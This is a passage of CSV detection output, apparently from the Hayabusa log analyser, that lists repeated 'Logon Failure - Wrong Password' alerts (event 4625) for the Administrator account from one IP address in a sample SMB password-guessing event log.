NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a0M5EaAXziu07hOH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PM1mwxqI7yVgoK2D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MPqnpvetHXdThxYg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gthbVQMJ7UD2QS7H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AwwJXCoC3gMDoDn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.068 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ilNNoVbZpyhtsNkV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eNY0lv9IglfHP34d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BjSeQciwy17L7raV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wycE1fIsmPq9zaMU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5z1spxImm2ZlGOld | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dg7o4GCET1bJrlEU | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E7Db3OLA0XPXL1B4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uoqx5iPRp2tfYYos | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ixw5XWC2frtrTUkv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3v0NpzAp7io9gbZQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AfOOiR2zO5xem9Tk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.582 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yiGtitRqZbGNKrtN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7oQ70LvSMnGxBCFO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGHr8623vHZyMY5B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X5Y1C9A4XqxQGoVA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SOnirLGOZzRVSt3y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jLu7XtYCHPqVNE7u | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w242Ei1CpWErEE4m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UOZUagVG4R6zcK92 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7hQOl8XV3Ydp8UcW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1XBRDfoN0I2iu6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ngyknhk7uGvs38bG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.996 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QXZUhLVsfRUBDcsu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VEDAtkhiSqUcLj2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M4CmH02M91kHzeK2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5St1kWrKP4PZlOIy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 17A6k4Om84gunQfB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y9GfR4XdixrNJHny | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 27JWPfEV4DgS1tNv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yNeJnXg1pyedSpqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WWihv14n9IAQXw2X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gy19bFWzQFaQZRBa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N28Ec4jkXkSNvsQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.447 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sD9qQWJbeukyPQbc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uoRSHXvwMeKg8cyQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bPEOhloL7vo1fTFQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: glbLglffka5JqQCN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7MTbgvYN6PIaKxeK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tAjWfgmGrm3o2mAx | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9EZYPG6uQtsez1UI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PRcnsdLAKd7enemG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUZEQaUavv7fWk4w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JKth56VEMqMCgwG9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TCGlvOFFkVpSHSoM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.860 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jmLxSIastsvqdJC8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IPyvUDHHWzbhyvZE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S7dF4fIlAvIBYiw0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bPDPtH2m9TgW8Khg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AChGHCNom0ds5ujV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8sLQI4KGgQRq2Sy9 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dqeLFLRT5EXiCBUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dx3tco9up7XnOa7h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZdNX4ubtpQaV9EeF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S05I0ZlGKGazkVkL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pzbfrYSYhxH6WcCt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.304 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGTvXs8Mlc0Fi7iT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C1LjtTFjPfPlBqAi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1lhJW3iO1xGGTMhp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMz7WmlBTgadVgN8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OB02epCA5pc5oBeJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KAFgReUMtu9VerRl | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ByeL26yQfohpQT3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 527r3nh9ocmItXfL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNeC1BBFVXv839Ys | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: juXXpQcoPfJLMQ3L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: njNdv4lGnsUpooCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.748 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j6VchLhWJT7cCWVR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r3xxnFpbd8zkFm0h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jtf156NEpOebQHGC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong 